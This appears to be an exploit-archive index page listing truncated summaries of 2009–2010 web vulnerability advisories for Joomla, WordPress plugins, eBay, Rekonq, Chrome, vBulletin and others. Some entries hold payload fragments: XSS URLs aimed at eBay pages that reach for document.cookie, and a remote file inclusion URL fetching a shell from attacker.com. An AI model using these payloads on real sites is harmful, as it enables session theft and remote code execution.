Oracle Sun Java System Web Server - HTTP Response Splitting

Oracle Sun Java System Web Server - HTTP Response Splitting Description Security-Assessment.com discovered that is possible to successfully perform an HTTP Response Splitting attack against applications served by Sun Java System Web Server. The vulnerability can be exploited if user supplied inpu...

Joomla Restaurant Guide Cross Site Scripting / Local File Inclusion / SQL Injection

Exploit Title: Joomla Component comrestaurantguide Multiple Vulnerabilities Date: 18.09.2010 Author: Valentin Category: webapps/0day Version: 1.0.0 Tested on: Debian lenny, Apache2, MySQL 5, Joomla 1.5.x CVE : Code : :::::::::::::::::::::::::::::::::::::: 0x1 :::::::::::::::::::::::::::::::::::::...

WordPress Plugin Events Manager Extended - Persistent Cross-Site Scripting

WordPress Plugin Events Manager Extended - Persistent Cross-Site Scripting Author: Craw Email: [email protected] Software Link: http://wordpress.org/extend/plugins/events-manager-extended/ Version: 3.1.2 Category: webapplications ======================================================= + ExploiT 1 ...

E-Bay Cross Site Scripting

http://donations.ebay.com/charity/charity.jsp?NPID=40219&name= "alert'XSS' http://worldofgood.ebay.com/Handmade-Jewelry-Earrings-Necklaces-Rings/47/list ?"alert'XSS' http://worldofgood.ebay.com/list?" http://sea.ebay.com/searchAnnoucement.php?time= "alertdocument.cookie...

Rekonq 0.5 Cross Site Scripting

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Nth Dimension Security Advisory NDSA20100818 Date: 18th August 2010 Author: Tim Brown URL: / Product: Rekonq 0.5 Vendor: Andrea Diamantini Risk: Medium Summary The Rekonq web browser is vulnerable to Javascript injection in a number of components of...

Medium security hole in Rekonq web browser

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Nth Dimension Security Advisory NDSA20100818 Date: 18th August 2010 Author: Tim Brown mailto:[email protected] URL: http://www.nth-dimension.org.uk/ / http://www.machine.org.uk/ Product: Rekonq 0.5 http://rekonq.sourceforge.net/ Vendor: Andr...

iScripts EasyBiller - Cross-Site Scripting

iScripts EasyBiller - Cross-Site Scripting $------------------------------------------------------------------------------------------------------------------- $ iScripts EasyBiller Cross Site Scripting Vulnerabilities $ Author : Sangteamtham $ Home : Hcegroup.net $ Download :...

iScripts EasyBiller - Cross-Site Scripting

$------------------------------------------------------------------------------------------------------------------- $ iScripts EasyBiller Cross Site Scripting Vulnerabilities $ Author : Sangteamtham $ Home : Hcegroup.net $ Download : http://www.iscripts.com/easybiller/ $ Date : 02/07/2010 $ Emai...

CVE-2010-0541 Ruby WEBrick javascript injection flaw

Cross-site scripting XSS vulnerability in the WEBrick HTTP server in Ruby in Apple Mac OS X 10.5.8, and 10.6 before 10.6.4, allows remote attackers to inject arbitrary web script or HTML via a crafted URI that triggers a UTF-7 error page...

Paessler - PRTG Traffic Grapher XSS

aushack.com - Vulnerability Advisory ----------------------------------------------- Release Date: 08-Jun-2010 Software: Paessler - PRTG Traffic Grapher http://www.paessler.com "PRTG Network Monitor runs 24/7 on a Windows-based machine within your network, recording network usage parameters...

Paessler PRTG Traffic Grapher 6.2.1.945 Cross Site Scripting

aushack.com - Vulnerability Advisory ----------------------------------------------- Release Date: 08-Jun-2010 Software: Paessler - PRTG Traffic Grapher http://www.paessler.com "PRTG Network Monitor runs 24/7 on a Windows-based machine within your network, recording network usage parameters...

Google Chrome 4.1.249.1059 Cross Origin Bypass

Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL GURL CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1663 Author: Jordi Chancel Software Link: http://googlechromereleases.blogspot.com/2010/04/stable-update-bug-and-security-fixes.html Description: The Google URL Parsing...

leaftec CMS - Multiple Vulnerabilities

leaftec CMS - Multiple Vulnerabilities Exploit Title: leaftec cms multiple vulnerabilities Date: 21.03.2010 Author: Valentin Höbel Version: Tested on: Debian etch CVE : Code : :: General information :: leaftec cms multiple vulnerabilities discovered :: by Valentin Höbel :: [email protected] ...

Vbulletin Blog 4.0.2 XSS Vulnerability

Exploit for php platform in category web applications ====================================== Vbulletin Blog 4.0.2 XSS Vulnerability ====================================== Author: FormatXformat Version: Vbulletin 4.0.2 Dork: Powered by vBulletin Version 4.0.2 Copyright 2010 vBulletin Solutions, In...

Silverstripe CMS 2.3.4 Cross Site Scripting

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Silverstripe CMS, , version 2.3.4 and lower and its unreleased 2.4 branch, is vulnerable to two Cross Site Scripting issues. 1. The comment posting mechanism of Silverstripe 'PostCommentForm' fails to properly sanitize the 'CommenterURL' parameter...

FDF Files Containing Timed JavaScript (CVE-2009-3956)

FDF is a file format used for representing form data and annotations that are contained in a PDF form. A remote attacker may exploit this issue to inject JavaScript into a PDF file from any domain on the internet. When Acrobat loads an FDF file, there is no check to ensure that the target file,...

2009 You! Hostit! XSS

No description provided by source. andresg888 Contact : andresg8884tgmaildotcom Web: : www.ilegalintrusion.nethttp://www.ilegalintrusion.net & www.bl4ck-p0rtal.orghttp://www.bl4ck-p0rtal.org Dork : No DoRk f0R ScRipT KiDDieS Example:...

DPI 1.1-final Powered by Clixint XSS

No description provided by source. andresg888 Vendor : http://www.image-host-script.com/ Contact : andresg8884tgmaildotcom Web: : www.ilegalintrusion.nethttp://www.ilegalintrusion.net & www.bl4ck-p0rtal.orghttp://www.bl4ck-p0rtal.org Dork : No DoRk f0R ScRipT KiDDieS Example1:...

Kide Shoutbox 0.4.6 - Cross-Site Scripting AXFR

Kide Shoutbox 0.4.6 - Cross-Site Scripting AXFR andresg888 Web: : www.ilegalintrusion.net & www.bl4ck-p0rtal.org Exploit : Go to the shoutbox and type: red text or hi or 3xplo!t : http://server/path/include/prodler.class.php?sPath=http://attacker.com/shell.txt??? Greetz : 84kur10 , Brunos50 Speci...

Fedora Core 10 FEDORA-2009-10377 (python-markdown2)

The remote host is missing an update to python-markdown2 announced via advisory FEDORA-2009-10377. OpenVAS Vulnerability Test $Id: fcore200910377.nasl 6624 2017-07-10 06:11:55Z cfischer $ Description: Auto-generated from advisory FEDORA-2009-10377 python-markdown2 Authors: Thomas Reinke Copyright...